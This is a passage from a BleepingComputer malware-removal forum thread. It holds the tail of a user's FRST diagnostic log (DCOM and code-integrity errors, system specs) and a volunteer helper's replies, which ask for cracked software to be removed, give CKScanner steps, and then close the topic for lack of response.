to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:51 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/30/2016 05:35:50 PM) (Source: DCOM) (EventID: 10016) (User: PASTOR)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
and APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
to the user PASTOR\Ptr. Julius Lampao SID (S-1-5-21-1061507693-3713582409-3664479191-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.


CodeIntegrity:
===================================
Date: 2016-04-07 22:13:16.866
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:13:16.112
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:12:08.472
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:12:07.689
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:12:06.920
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-04-07 22:12:06.155
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume8\Unlocker_1.9.2\UnlockerDriver5.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-09-12 14:23:40.537
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\csrss.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\user32.dll that did not meet the Windows signing level requirements.

Date: 2015-09-12 14:23:40.131
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\smss.exe) attempted to load \Device\HarddiskVolume4\Windows\SysWOW64\user32.dll that did not meet the Windows signing level requirements.

Date: 2015-09-12 14:23:38.209
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\smss.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\user32.dll that did not meet the Windows signing level requirements.

Date: 2015-09-12 13:43:52.334
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\csrss.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\user32.dll that did not meet the Windows signing level requirements.


==================== Memory info ===========================

Processor: Intel® Celeron® CPU N2820 @ 2.13GHz
Percentage of memory in use: 61%
Total physical RAM: 3978.84 MB
Available physical RAM: 1521.13 MB
Total Virtual: 7503.84 MB
Available Virtual: 4532.58 MB

==================== Drives ================================

Drive c: (TI80158600B) (Fixed) (Total:195.32 GB) (Free:132.59 GB) NTFS
Drive d: (Drive) (Fixed) (Total:260.13 GB) (Free:127.17 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 04441887)

Partition: GPT.

==================== End of Addition.txt ============================

Attached Files


Edited by Oh My!, 05 December 2016 - 08:42 PM.


BC AdBot (Login to Remove)

 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,044 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:54 PM

Posted 05 December 2016 - 11:35 AM

Greetings J2M-CJBE and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. Please allow me just a bit of time to review what you have posted.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,044 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:54 PM

Posted 05 December 2016 - 08:59 PM

Greetings.

Unfortunately there is evidence of illegal software on your computer. I am going to request you completely uninstall Microsoft Office Professional Plus 2013 and any other products for which you do not have a valid Product Key, including all "cracked" software. If you are willing to do that please rerun a FRST scan and copy/paste both reports in your reply. If you prefer to leave the program(s) on your computer let me know that and I will be closing the Topic.

If you decide to remove the program(s) please run this after removal.

===================================================

CKScanner

--------------------
  • Download CKScanner and save it to your Desktop
  • Double click CKScanner
  • Select Search For Files
  • Once completed select Save List to File
  • A ckfiles.txt document will be placed on your Desktop
  • Copy and paste the results of that report in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • CKScanner report
  • FRST report
  • Addition report

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#4 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,044 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:54 PM

Posted 09 December 2016 - 09:45 AM

Greetings,

===================================================

Do You Still Need Help?

It has been 3 days since my last post.
  • Do you still need help with this?
  • If you have not replied within 48 hours I will assume you have abandoned the Topic and it will be closed.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#5 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,044 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:54 PM

Posted 11 December 2016 - 09:57 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users